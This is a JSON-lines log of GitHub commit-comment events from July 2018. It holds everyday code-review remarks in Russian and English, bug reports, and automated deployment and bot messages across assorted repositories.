{"id":"7950010359","type":"CommitCommentEvent","actor":{"login":"akimlyubchenko"},"repo":{"name":"akimlyubchenko/Training-Summer-Express-2018"},"payload":{"comment":{"id":29670922,"position":28,"line":21,"path":"NET.S.2018.Lyubchenko.05.06/Polynomial/Polynomial.cs","commit_id":"a3ec7ea271a6eb54f46a4ceaee630f52b67a5e02","created_at":"2018-07-11T13:17:02Z","updated_at":"2018-07-11T13:17:02Z","author_association":"OWNER","body":"нужно делать цикл,который будет сохранять каждый элемент?"}},"created_at":"2018-07-11T13:17:02Z"}
{"id":"7950012181","type":"CommitCommentEvent","actor":{"login":"akimlyubchenko"},"repo":{"name":"akimlyubchenko/Training-Summer-Express-2018"},"payload":{"comment":{"id":29670925,"position":53,"line":31,"path":"NET.S.2018.Lyubchenko.05.06/Polynomial/Polynomial.cs","commit_id":"a3ec7ea271a6eb54f46a4ceaee630f52b67a5e02","created_at":"2018-07-11T13:17:22Z","updated_at":"2018-07-11T13:17:22Z","author_association":"OWNER","body":"Но ведь это индексатор, почему нет?"}},"created_at":"2018-07-11T13:17:22Z"}
{"id":"7950015750","type":"CommitCommentEvent","actor":{"login":"fanghuaqi"},"repo":{"name":"wangnuannuan/embarc_applications"},"payload":{"comment":{"id":29670930,"position":null,"line":null,"path":null,"commit_id":"3d32f0dfdc529802e33985a32fab3cad87e5aa33","created_at":"2018-07-11T13:17:59Z","updated_at":"2018-07-11T13:17:59Z","author_association":"NONE","body":"No need to build arcem4, arcem9d"}},"created_at":"2018-07-11T13:17:59Z"}
{"id":"7950016244","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"akimlyubchenko/Training-Summer-Express-2018"},"payload":{"comment":{"id":29670932,"position":28,"line":21,"path":"NET.S.2018.Lyubchenko.05.06/Polynomial/Polynomial.cs","commit_id":"a3ec7ea271a6eb54f46a4ceaee630f52b67a5e02","created_at":"2018-07-11T13:18:05Z","updated_at":"2018-07-11T13:18:05Z","author_association":"NONE","body":"Array.Copy вполне подойдет"}},"created_at":"2018-07-11T13:18:05Z"}
{"id":"7950017433","type":"CommitCommentEvent","actor":{"login":"fanghuaqi"},"repo":{"name":"wangnuannuan/embarc_applications"},"payload":{"comment":{"id":29670936,"position":null,"line":null,"path":null,"commit_id":"3d32f0dfdc529802e33985a32fab3cad87e5aa33","created_at":"2018-07-11T13:18:16Z","updated_at":"2018-07-11T13:18:16Z","author_association":"NONE","body":"Change the yaml file"}},"created_at":"2018-07-11T13:18:16Z"}
{"id":"7950018081","type":"CommitCommentEvent","actor":{"login":"VickyGit"},"repo":{"name":"VickyGit/topo"},"payload":{"comment":{"id":29670940,"position":1,"line":1,"path":"README.md","commit_id":"1bac59f25bdabc3d3fcdb77f17f3c7964edac435","created_at":"2018-07-11T13:18:23Z","updated_at":"2018-07-11T13:18:23Z","author_association":"OWNER","body":"111"}},"created_at":"2018-07-11T13:18:23Z"}
{"id":"7950020348","type":"CommitCommentEvent","actor":{"login":"Laiane-Carvalho"},"repo":{"name":"Laiane-Carvalho/zplay"},"payload":{"comment":{"id":29670947,"position":null,"line":null,"path":null,"commit_id":"08733fb0aa60f0e5198a9f2d60ce0e1b47731160","created_at":"2018-07-11T13:18:47Z","updated_at":"2018-07-11T13:18:47Z","author_association":"OWNER","body":"authentication using firebase"}},"created_at":"2018-07-11T13:18:47Z"}
{"id":"7950021767","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29670949,"position":22,"line":807,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"9ee7db8c531a886daaf3e1a197a6ff4068756803","created_at":"2018-07-11T13:19:01Z","updated_at":"2018-07-11T13:19:01Z","author_association":"COLLABORATOR","body":"definitely  LR here and use/mt + RL in Turkish if this is necessary. Wouldn't \"böyle\" work?"}},"created_at":"2018-07-11T13:19:01Z"}
{"id":"7950023194","type":"CommitCommentEvent","actor":{"login":"akimlyubchenko"},"repo":{"name":"akimlyubchenko/Training-Summer-Express-2018"},"payload":{"comment":{"id":29670955,"position":28,"line":21,"path":"NET.S.2018.Lyubchenko.05.06/Polynomial/Polynomial.cs","commit_id":"a3ec7ea271a6eb54f46a4ceaee630f52b67a5e02","created_at":"2018-07-11T13:19:17Z","updated_at":"2018-07-11T13:19:17Z","author_association":"OWNER","body":"аа, точно, хорошо, сделаю "}},"created_at":"2018-07-11T13:19:17Z"}
{"id":"7950032140","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"akimlyubchenko/Training-Summer-Express-2018"},"payload":{"comment":{"id":29670970,"position":53,"line":31,"path":"NET.S.2018.Lyubchenko.05.06/Polynomial/Polynomial.cs","commit_id":"a3ec7ea271a6eb54f46a4ceaee630f52b67a5e02","created_at":"2018-07-11T13:20:50Z","updated_at":"2018-07-11T13:20:50Z","author_association":"NONE","body":"тип исключения IndexOutOfRangeException \"выбрасывают\" только массивы, вы же сообщаете всем клиентам, на чем реализовали тип полином, подумайте - будут и кого проблемы, если измениться внутренняя структура - массив замените на что-то другое"}},"created_at":"2018-07-11T13:20:50Z"}
{"id":"7950032840","type":"CommitCommentEvent","actor":{"login":"benjamin-bueckendorf"},"repo":{"name":"ionic-team/starters"},"payload":{"comment":{"id":29670973,"position":null,"line":null,"path":null,"commit_id":"18196edb9e2aad48ea448ac1c9f2544a879fec4c","created_at":"2018-07-11T13:20:57Z","updated_at":"2018-07-11T13:20:57Z","author_association":"NONE","body":"Hi,\r\n\r\nwhen I run ionic cordova build browser (I have not tested other platforms, see version info below) ` <base href=\"/\" />` results in none of the files such as main.js being found. Using `<base href=\"./\" />` or the previous script works.\r\n\r\n```\r\nIonic:\r\n\r\n   ionic (Ionic CLI)          : 4.0.0-rc.10 (/usr/lib/node_modules/ionic)\r\n   Ionic Framework            : @ionic/angular 4.0.0-alpha.7\r\n   @angular-devkit/core       : 0.7.0-rc.0\r\n   @angular-devkit/schematics : 0.7.0-rc.0\r\n   @angular/cli               : 6.0.8\r\n   @ionic/ng-toolkit          : 1.0.0-rc.9\r\n   @ionic/schematics-angular  : 1.0.0-rc.9\r\n\r\nCordova:\r\n\r\n   cordova (Cordova CLI) : 8.0.0\r\n   Cordova Platforms     : browser 5.0.3\r\n\r\nSystem:\r\n\r\n   NodeJS : v8.11.3 (/usr/bin/node)\r\n   npm    : 6.1.0\r\n   OS     : Linux 4.17\r\n\r\nEnvironment:\r\n\r\n   ANDROID_HOME : not set\r\n```"}},"created_at":"2018-07-11T13:20:57Z"}
{"id":"7950041823","type":"CommitCommentEvent","actor":{"login":"radumas"},"repo":{"name":"CityofToronto/bdit_data-sources"},"payload":{"comment":{"id":29670986,"position":null,"line":null,"path":null,"commit_id":"750bbb97b40e87581283bcb042ec2d16b1193194","created_at":"2018-07-11T13:22:27Z","updated_at":"2018-07-11T13:22:27Z","author_association":"MEMBER","body":"#115 "}},"created_at":"2018-07-11T13:22:27Z"}
{"id":"7950079960","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"akimlyubchenko/Training-Summer-Express-2018"},"payload":{"comment":{"id":29671079,"position":87,"line":60,"path":"NET.S.2018.Lyubchenko.05.06/Polynomial/Polynomial.cs","commit_id":"a3ec7ea271a6eb54f46a4ceaee630f52b67a5e02","created_at":"2018-07-11T13:28:47Z","updated_at":"2018-07-11T13:28:47Z","author_association":"NONE","body":"как мне кажется, можно было бы поместить в какую-нибудь из веток < или >  "}},"created_at":"2018-07-11T13:28:47Z"}
{"id":"7950081732","type":"CommitCommentEvent","actor":{"login":"Meepedy"},"repo":{"name":"tektechnologies/Code-Wars"},"payload":{"comment":{"id":29671081,"position":10,"line":3,"path":"dayTwoCodeWar/solution.js","commit_id":"e4eb3e699ada9a7efa9c4d2bbbe92132a451f7f8","created_at":"2018-07-11T13:29:04Z","updated_at":"2018-07-11T13:29:04Z","author_association":"NONE","body":"You don't actually have to assign a new array here, you could just return arr.reverse() if you wanted"}},"created_at":"2018-07-11T13:29:04Z"}
{"id":"7950087004","type":"CommitCommentEvent","actor":{"login":"damccoy1"},"repo":{"name":"UA-ACM-Student-Chapter/UA-ACM-Student-Chapter.github.io"},"payload":{"comment":{"id":29671093,"position":5,"line":42,"path":"js/acm-1.0.1.js","commit_id":"2789e7a15bc8e37451fa1a5b077c876079553ec1","created_at":"2018-07-11T13:29:59Z","updated_at":"2018-07-11T13:29:59Z","author_association":"CONTRIBUTOR","body":"good point. i forgot to do tolower here like other places.\r\nwhat i will actually get to doing is doing a precheck with the ua acm user db, so that we verify they've already joined (which means they've verified their email is good).\r\nwe got around the heroku instances being on the free tier and slow to boot up by doing a wakeup get request when the user loads the acm webpage."}},"created_at":"2018-07-11T13:29:59Z"}
{"id":"7950087487","type":"CommitCommentEvent","actor":{"login":"stringparser"},"repo":{"name":"git/git"},"payload":{"comment":{"id":29671097,"position":1,"line":1,"path":"Makefile","commit_id":"e83c5163316f89bfbde7d9ab23ca2e25604af290","created_at":"2018-07-11T13:30:03Z","updated_at":"2018-07-11T13:30:03Z","author_association":"NONE","body":"I love this world we are building"}},"created_at":"2018-07-11T13:30:03Z"}
{"id":"7950090015","type":"CommitCommentEvent","actor":{"login":"ezenko"},"repo":{"name":"colours/nhtv"},"payload":{"comment":{"id":29671106,"position":null,"line":null,"path":null,"commit_id":"2c844413ba6b0762c936833b51f5d0a4bb3d891f","created_at":"2018-07-11T13:30:27Z","updated_at":"2018-07-11T13:30:27Z","author_association":"NONE","body":"Created multidev environment [nhtv#ci-267](https://dashboard.pantheon.io/sites/a5faca03-4b4c-4936-95b8-6410ab7b2c55#ci-267).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-267-nhtv.pantheonsite.io/)"}},"created_at":"2018-07-11T13:30:27Z"}
{"id":"7950094457","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/backward-cpp-feedstock"},"payload":{"comment":{"id":29671113,"position":null,"line":null,"path":null,"commit_id":"8c570805251484e27d2204e461709a82c489ed97","created_at":"2018-07-11T13:31:11Z","updated_at":"2018-07-11T13:31:11Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @bombela were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @bombela were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-11T13:31:11Z"}
{"id":"7950098730","type":"CommitCommentEvent","actor":{"login":"newnakashima"},"repo":{"name":"originbenntou/E-Lunch"},"payload":{"comment":{"id":29671121,"position":null,"line":null,"path":null,"commit_id":"207ca9f8a238bc073c50c0990adcca784094e621","created_at":"2018-07-11T13:31:51Z","updated_at":"2018-07-11T13:31:51Z","author_association":"COLLABORATOR","body":"🍺"}},"created_at":"2018-07-11T13:31:51Z"}
{"id":"7950099844","type":"CommitCommentEvent","actor":{"login":"akimlyubchenko"},"repo":{"name":"akimlyubchenko/Training-Summer-Express-2018"},"payload":{"comment":{"id":29671124,"position":87,"line":60,"path":"NET.S.2018.Lyubchenko.05.06/Polynomial/Polynomial.cs","commit_id":"a3ec7ea271a6eb54f46a4ceaee630f52b67a5e02","created_at":"2018-07-11T13:32:03Z","updated_at":"2018-07-11T13:32:03Z","author_association":"OWNER","body":"Честно говоря, совсем не понял о чем вы))"}},"created_at":"2018-07-11T13:32:03Z"}
{"id":"7950101514","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-xkcd-bot"},"payload":{"comment":{"id":29671127,"position":null,"line":null,"path":null,"commit_id":"766f95dbcd2f39c5d71135d211787531317f62d4","created_at":"2018-07-11T13:32:19Z","updated_at":"2018-07-11T13:32:19Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4657741e-2f67-4a84-85fa-4b0c731e26d1?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/e457c094-74cf-4ee8-bf2e-53b78dadcc49?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\") deployed [watsonwork-xkcd-bot](https://github.com/WilliamHolmes/watsonwork-xkcd-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180711-133218 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180711-133218\") to [dev](https://console.bluemix.net/apps/0071371e-8c32-4628-9342-c288956009e4?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-11T13:32:19Z"}
{"id":"7950107934","type":"CommitCommentEvent","actor":{"login":"uspehcours"},"repo":{"name":"uspehcoursbrest/BusinessBotIncubator"},"payload":{"comment":{"id":29671139,"position":null,"line":null,"path":null,"commit_id":"f8d522168dd8e66e08c8d5d338d106582230bfff","created_at":"2018-07-11T13:33:21Z","updated_at":"2018-07-11T13:33:21Z","author_association":"NONE","body":"Максим, отлично. "}},"created_at":"2018-07-11T13:33:21Z"}
{"id":"7950113945","type":"CommitCommentEvent","actor":{"login":"dmitrybubyakin"},"repo":{"name":"ablashimov/refactoring"},"payload":{"comment":{"id":29671170,"position":22,"line":37,"path":"task.php","commit_id":"05f3ccb18c3da7b90d9a0dea5c56b7b26e3d9847","created_at":"2018-07-11T13:34:21Z","updated_at":"2018-07-11T13:34:21Z","author_association":"NONE","body":"Медот `getFormat` не очень подходит. У нас фабрика, можно назвать его `create` например. "}},"created_at":"2018-07-11T13:34:21Z"}
{"id":"7950117690","type":"CommitCommentEvent","actor":{"login":"dmitrybubyakin"},"repo":{"name":"ablashimov/refactoring"},"payload":{"comment":{"id":29671176,"position":22,"line":37,"path":"task.php","commit_id":"05f3ccb18c3da7b90d9a0dea5c56b7b26e3d9847","created_at":"2018-07-11T13:34:58Z","updated_at":"2018-07-11T13:34:58Z","author_association":"NONE","body":"Почему переменная `$result`? Название не подходит"}},"created_at":"2018-07-11T13:34:58Z"}
{"id":"7950119102","type":"CommitCommentEvent","actor":{"login":"LukasBanana"},"repo":{"name":"FlaxEngine/XShaderCompiler"},"payload":{"comment":{"id":29671179,"position":6,"line":142,"path":"inc/Xsc/Xsc.h","commit_id":"0121f92d155071f97566cf313be69973aa3f0bc5","created_at":"2018-07-11T13:35:13Z","updated_at":"2018-07-11T13:35:13Z","author_association":"NONE","body":"Hi there. I've just added the same member in [7fc307b](https://github.com/LukasBanana/XShaderCompiler/commit/7fc307b29bfc7f1931d22688203cf54948f5c2ff).\r\nI would have done a cherry pick but since I'm not very experienced with cherry picks (no necessity so far) and your change also does not include the option in the C and C# wrappers, I've added it myself.\r\nJust wanted to let you know, next time I'll try to make your contribution become visible.\r\nGreetings,\r\nLukas"}},"created_at":"2018-07-11T13:35:13Z"}
{"id":"7950127568","type":"CommitCommentEvent","actor":{"login":"dmitrybubyakin"},"repo":{"name":"ablashimov/refactoring"},"payload":{"comment":{"id":29671197,"position":53,"line":46,"path":"task.php","commit_id":"05f3ccb18c3da7b90d9a0dea5c56b7b26e3d9847","created_at":"2018-07-11T13:36:33Z","updated_at":"2018-07-11T13:36:33Z","author_association":"NONE","body":"Ужасная строка. Можно улучшить читабельность таким образом: \r\n```php\r\n$result = \"Rental Record for {$this->getName()}\" . PHP_EOL;\r\n```"}},"created_at":"2018-07-11T13:36:33Z"}
{"id":"7950129220","type":"CommitCommentEvent","actor":{"login":"jarvist"},"repo":{"name":"jarvist/TheDancer.jl"},"payload":{"comment":{"id":29671201,"position":null,"line":null,"path":null,"commit_id":"dd3e723d6abae5f59adcb61c2a5f3557eeca26e2","created_at":"2018-07-11T13:36:49Z","updated_at":"2018-07-11T13:36:49Z","author_association":"OWNER","body":"OK @RoseTeague , this is now a minimum working example - you can have a model type + it has transparent array views into S/H.\r\n\r\nSo you can do nice stuff like this:\r\n```julia\r\njulia> include(\"types.jl\")\r\n\r\njulia> m=TightBindingModel(3)\r\nTightBindingModel(3, [0.0 0.0 0.0; 0.0 0.0 0.0; 0.0 0.0 0.0], [0.0, 0.0, 0.0], [0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0])\r\n\r\njulia> m.S[1]=1.0\r\n1.0\r\n\r\njulia> m.H\r\n3×3 Array{Float64,2}:\r\n 1.0  0.0  0.0\r\n 0.0  0.0  0.0\r\n 0.0  0.0  0.0\r\n\r\njulia> m.H[2,2]=3.0\r\n3.0\r\n\r\njulia> m.H\r\n3×3 Array{Float64,2}:\r\n 1.0  0.0  0.0\r\n 0.0  3.0  0.0\r\n 0.0  0.0  0.0\r\n\r\njulia> m.S\r\n3-element SubArray{Float64,1,Array{Float64,1},Tuple{StepRange{Int64,Int64}},true}:\r\n 1.0\r\n 3.0\r\n 0.0\r\n```"}},"created_at":"2018-07-11T13:36:49Z"}
{"id":"7950131756","type":"CommitCommentEvent","actor":{"login":"dmitrybubyakin"},"repo":{"name":"ablashimov/refactoring"},"payload":{"comment":{"id":29671206,"position":69,"line":59,"path":"task.php","commit_id":"05f3ccb18c3da7b90d9a0dea5c56b7b26e3d9847","created_at":"2018-07-11T13:37:13Z","updated_at":"2018-07-11T13:37:13Z","author_association":"NONE","body":"Не проще все элементы собрать в массив, а затем выполнить `implode(PHP_EOL, $lines)`"}},"created_at":"2018-07-11T13:37:13Z"}
{"id":"7950134980","type":"CommitCommentEvent","actor":{"login":"dmitrybubyakin"},"repo":{"name":"ablashimov/refactoring"},"payload":{"comment":{"id":29671208,"position":77,"line":63,"path":"task.php","commit_id":"05f3ccb18c3da7b90d9a0dea5c56b7b26e3d9847","created_at":"2018-07-11T13:37:43Z","updated_at":"2018-07-11T13:37:43Z","author_association":"NONE","body":"Что здесь происходит? "}},"created_at":"2018-07-11T13:37:43Z"}
{"id":"7950135546","type":"CommitCommentEvent","actor":{"login":"IgorKachura"},"repo":{"name":"BibleQuote/BibleQuote-Modules"},"payload":{"comment":{"id":29671210,"position":null,"line":null,"path":null,"commit_id":"a9b83d7c38222e22ed9d863d75bcc52abaeb0a58","created_at":"2018-07-11T13:37:48Z","updated_at":"2018-07-11T13:37:48Z","author_association":"CONTRIBUTOR","body":"Bible_Russian_RSP-Notes 0.0.1"}},"created_at":"2018-07-11T13:37:48Z"}
{"id":"7950138856","type":"CommitCommentEvent","actor":{"login":"dmitrybubyakin"},"repo":{"name":"ablashimov/refactoring"},"payload":{"comment":{"id":29671220,"position":110,"line":88,"path":"task.php","commit_id":"05f3ccb18c3da7b90d9a0dea5c56b7b26e3d9847","created_at":"2018-07-11T13:38:19Z","updated_at":"2018-07-11T13:38:19Z","author_association":"NONE","body":"Во что мы конвертируем? Почему так назвал интерфейс? Это название сюда не подходит"}},"created_at":"2018-07-11T13:38:19Z"}
{"id":"7950139703","type":"CommitCommentEvent","actor":{"login":"StashBank"},"repo":{"name":"StashBank/edison-anticafe-crm"},"payload":{"comment":{"id":29671222,"position":null,"line":null,"path":null,"commit_id":"098a6ae213d6ae089efbe1a8a5de77f3026d74cd","created_at":"2018-07-11T13:38:29Z","updated_at":"2018-07-11T13:38:29Z","author_association":"OWNER","body":"Validators.pattern(/^([A-z][A-Za-z]*\\s+[A-Za-z]*)|([A-z][A-Za-z]*)$/),] - можно еще маску добавить и возможно тултип (потом)"}},"created_at":"2018-07-11T13:38:29Z"}
{"id":"7950140297","type":"CommitCommentEvent","actor":{"login":"OmYasien"},"repo":{"name":"udacity/course-collaboration-travel-plans"},"payload":{"comment":{"id":29671225,"position":1,"line":40,"path":"css/app.css","commit_id":"b2d03536aff58643adec3db169c832069c9c9d32","created_at":"2018-07-11T13:38:34Z","updated_at":"2018-07-11T13:38:34Z","author_association":"NONE","body":"text-align: left:"}},"created_at":"2018-07-11T13:38:34Z"}
{"id":"7950140463","type":"CommitCommentEvent","actor":{"login":"StashBank"},"repo":{"name":"StashBank/edison-anticafe-crm"},"payload":{"comment":{"id":29671226,"position":null,"line":null,"path":null,"commit_id":"098a6ae213d6ae089efbe1a8a5de77f3026d74cd","created_at":"2018-07-11T13:38:36Z","updated_at":"2018-07-11T13:38:36Z","author_association":"OWNER","body":"[disabled]=\"(form?.touched || form?.dirty) && form?.invalid\" лучше так"}},"created_at":"2018-07-11T13:38:36Z"}
{"id":"7950141494","type":"CommitCommentEvent","actor":{"login":"StashBank"},"repo":{"name":"StashBank/edison-anticafe-crm"},"payload":{"comment":{"id":29671233,"position":null,"line":null,"path":null,"commit_id":"098a6ae213d6ae089efbe1a8a5de77f3026d74cd","created_at":"2018-07-11T13:38:46Z","updated_at":"2018-07-11T13:38:46Z","author_association":"OWNER","body":"public newPassword(id: string, userData: User) -> public changePassword(id: string, userData: User)"}},"created_at":"2018-07-11T13:38:46Z"}
{"id":"7950143663","type":"CommitCommentEvent","actor":{"login":"dmitrybubyakin"},"repo":{"name":"ablashimov/refactoring"},"payload":{"comment":{"id":29671237,"position":116,"line":93,"path":"task.php","commit_id":"05f3ccb18c3da7b90d9a0dea5c56b7b26e3d9847","created_at":"2018-07-11T13:39:08Z","updated_at":"2018-07-11T13:39:08Z","author_association":"NONE","body":"Переименуй в StringFormatter"}},"created_at":"2018-07-11T13:39:08Z"}
{"id":"7950145158","type":"CommitCommentEvent","actor":{"login":"dmitrybubyakin"},"repo":{"name":"ablashimov/refactoring"},"payload":{"comment":{"id":29671242,"position":127,"line":102,"path":"task.php","commit_id":"05f3ccb18c3da7b90d9a0dea5c56b7b26e3d9847","created_at":"2018-07-11T13:39:22Z","updated_at":"2018-07-11T13:39:22Z","author_association":"NONE","body":"Переименуй в HtmlFormatter"}},"created_at":"2018-07-11T13:39:22Z"}
{"id":"7950146442","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-xkcd-bot"},"payload":{"comment":{"id":29671247,"position":null,"line":null,"path":null,"commit_id":"8be74d1a886327929a8c7e6cc3d7a52c54d8a789","created_at":"2018-07-11T13:39:35Z","updated_at":"2018-07-11T13:39:35Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4657741e-2f67-4a84-85fa-4b0c731e26d1?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/e457c094-74cf-4ee8-bf2e-53b78dadcc49?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\") deployed [watsonwork-xkcd-bot](https://github.com/WilliamHolmes/watsonwork-xkcd-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180711-133934 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180711-133934\") to [dev](https://console.bluemix.net/apps/0071371e-8c32-4628-9342-c288956009e4?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-11T13:39:35Z"}
{"id":"7950147129","type":"CommitCommentEvent","actor":{"login":"dmitrybubyakin"},"repo":{"name":"ablashimov/refactoring"},"payload":{"comment":{"id":29671248,"position":139,"line":113,"path":"task.php","commit_id":"05f3ccb18c3da7b90d9a0dea5c56b7b26e3d9847","created_at":"2018-07-11T13:39:42Z","updated_at":"2018-07-11T13:39:42Z","author_association":"NONE","body":"Где отступы? Что за страшный код?"}},"created_at":"2018-07-11T13:39:42Z"}
{"id":"7950147593","type":"CommitCommentEvent","actor":{"login":"giannif"},"repo":{"name":"Giphy/giphy-js-sdk-core"},"payload":{"comment":{"id":29671250,"position":39,"line":3,"path":"package.json","commit_id":"9ffc6aa59881a8af67e80dd5bb6c32b78825c788","created_at":"2018-07-11T13:39:46Z","updated_at":"2018-07-11T13:39:46Z","author_association":"NONE","body":"@cosmocochrane1 `1.0.4` would be the most common naming convention"}},"created_at":"2018-07-11T13:39:46Z"}
{"id":"7950147784","type":"CommitCommentEvent","actor":{"login":"RoseTeague"},"repo":{"name":"jarvist/TheDancer.jl"},"payload":{"comment":{"id":29671252,"position":null,"line":null,"path":null,"commit_id":"dd3e723d6abae5f59adcb61c2a5f3557eeca26e2","created_at":"2018-07-11T13:39:49Z","updated_at":"2018-07-11T13:39:49Z","author_association":"COLLABORATOR","body":"Neat! "}},"created_at":"2018-07-11T13:39:49Z"}
{"id":"7950148912","type":"CommitCommentEvent","actor":{"login":"domwashburn"},"repo":{"name":"semantic-release/semantic-release"},"payload":{"comment":{"id":29671255,"position":126,"line":126,"path":"index.js","commit_id":"b4440fe0d38ceb972bdda9ccb24aafb78e8b3cef","created_at":"2018-07-11T13:40:00Z","updated_at":"2018-07-11T13:40:00Z","author_association":"NONE","body":"#### Package.json Release Key\r\n\r\n``` json\r\n\"release\": {\r\n    \"branches\": [\r\n      \"master\",\r\n      {\r\n        \"name\": \"development\",\r\n        \"channel\": \"beta\",\r\n        \"prerelease\": \"beta\"\r\n      }\r\n    ],\r\n    \"githubUrl\": \"GitHub Enterprise URL\",\r\n    \"githubApiPathPrefix\": \"GitHub Enterprise API \",\r\n    \"analyzeCommits\": \"semantic-release-conventional-commits\"\r\n  }\r\n```\r\n\r\nI'm running `semantic-release --no-ci` on my development branch, which returns this error. \r\n\r\n``` bash\r\n[Semantic release]: There is no previous release, the next release version is 1.0.0-beta.0\r\n[Semantic release]: EINVALIDNEXTVERSION TODO\r\nTODO\r\n\r\n\r\n{ SemanticReleaseError: TODO\r\n    at module.exports (/Users/dominickwashburn/.npm/_npx/81643/lib/node_modules/semantic-release/lib/get-error.js:6:10)\r\n    at run (/Users/dominickwashburn/.npm/_npx/81643/lib/node_modules/semantic-release/index.js:129:11)\r\n    at <anonymous>\r\n    at process._tickCallback (internal/process/next_tick.js:182:7)\r\n  name: 'SemanticReleaseError',\r\n  code: 'EINVALIDNEXTVERSION',\r\n  details: 'TODO',\r\n  semanticRelease: true }\r\n```"}},"created_at":"2018-07-11T13:40:00Z"}
{"id":"7950150160","type":"CommitCommentEvent","actor":{"login":"Anush12133"},"repo":{"name":"LLuviaOS/android_packages_apps_Tormenta"},"payload":{"comment":{"id":29671256,"position":null,"line":null,"path":null,"commit_id":"da6c8d4703e1b03dc47e934ccb003aeefc35d01b","created_at":"2018-07-11T13:40:12Z","updated_at":"2018-07-11T13:40:12Z","author_association":"NONE","body":"[2/2] sorry XD"}},"created_at":"2018-07-11T13:40:12Z"}
{"id":"7950151573","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29671258,"position":3,"line":2,"path":"Lesson3/station.rb","commit_id":"8bfa7bce833b38613c1e2f2bfe6dde0397b6f1d2","created_at":"2018-07-11T13:40:24Z","updated_at":"2018-07-11T13:40:24Z","author_association":"NONE","body":"Во первых :passenger_trains_count у тебя нигде больше не используется. Когда ты исправишь trains_count_by_type будет понятно, как это можно вычислить без инстэнс переменной. И вот пример почему инстэнс переменная плохая идея. Смотри.\r\n```\r\n@station.passenger_trains_count # => nil\r\n@station.add_train(passenger_train)\r\n@station.passenger_trains_count # => nil\r\n@station.trains_count_by_type # irrelevant output\r\n@station.passenger_trains_count # => 1\r\n@station.add_train(another_passenger_train)\r\n@station.add_train(and_another_passenger_train)\r\n@station.passenger_trains_count # => 1\r\n```"}},"created_at":"2018-07-11T13:40:24Z"}
{"id":"7950153988","type":"CommitCommentEvent","actor":{"login":"jeancsil"},"repo":{"name":"golang/dep"},"payload":{"comment":{"id":29671264,"position":null,"line":null,"path":null,"commit_id":"3e10ea7ccd1d815d8c68ae9273679ebf55ce9a89","created_at":"2018-07-11T13:40:47Z","updated_at":"2018-07-11T13:40:47Z","author_association":"NONE","body":"Cool, thank you!"}},"created_at":"2018-07-11T13:40:47Z"}
{"id":"7950154327","type":"CommitCommentEvent","actor":{"login":"dmitrybubyakin"},"repo":{"name":"ablashimov/refactoring"},"payload":{"comment":{"id":29671267,"position":175,"line":138,"path":"task.php","commit_id":"05f3ccb18c3da7b90d9a0dea5c56b7b26e3d9847","created_at":"2018-07-11T13:40:50Z","updated_at":"2018-07-11T13:40:50Z","author_association":"NONE","body":"Сомневаюсь что этот код работает. `countAmount`, а не `CountAmount`"}},"created_at":"2018-07-11T13:40:50Z"}
{"id":"7950163180","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29671286,"position":3,"line":2,"path":"Lesson3/station.rb","commit_id":"8bfa7bce833b38613c1e2f2bfe6dde0397b6f1d2","created_at":"2018-07-11T13:42:13Z","updated_at":"2018-07-11T13:42:13Z","author_association":"NONE","body":"инстанс переменная ```@passenger_trains_count``` не считает поезда, а просто возвращает записанное в нее значение. Не нужно использовать инстэнс переменные для данных, которые можно вычислить."}},"created_at":"2018-07-11T13:42:13Z"}
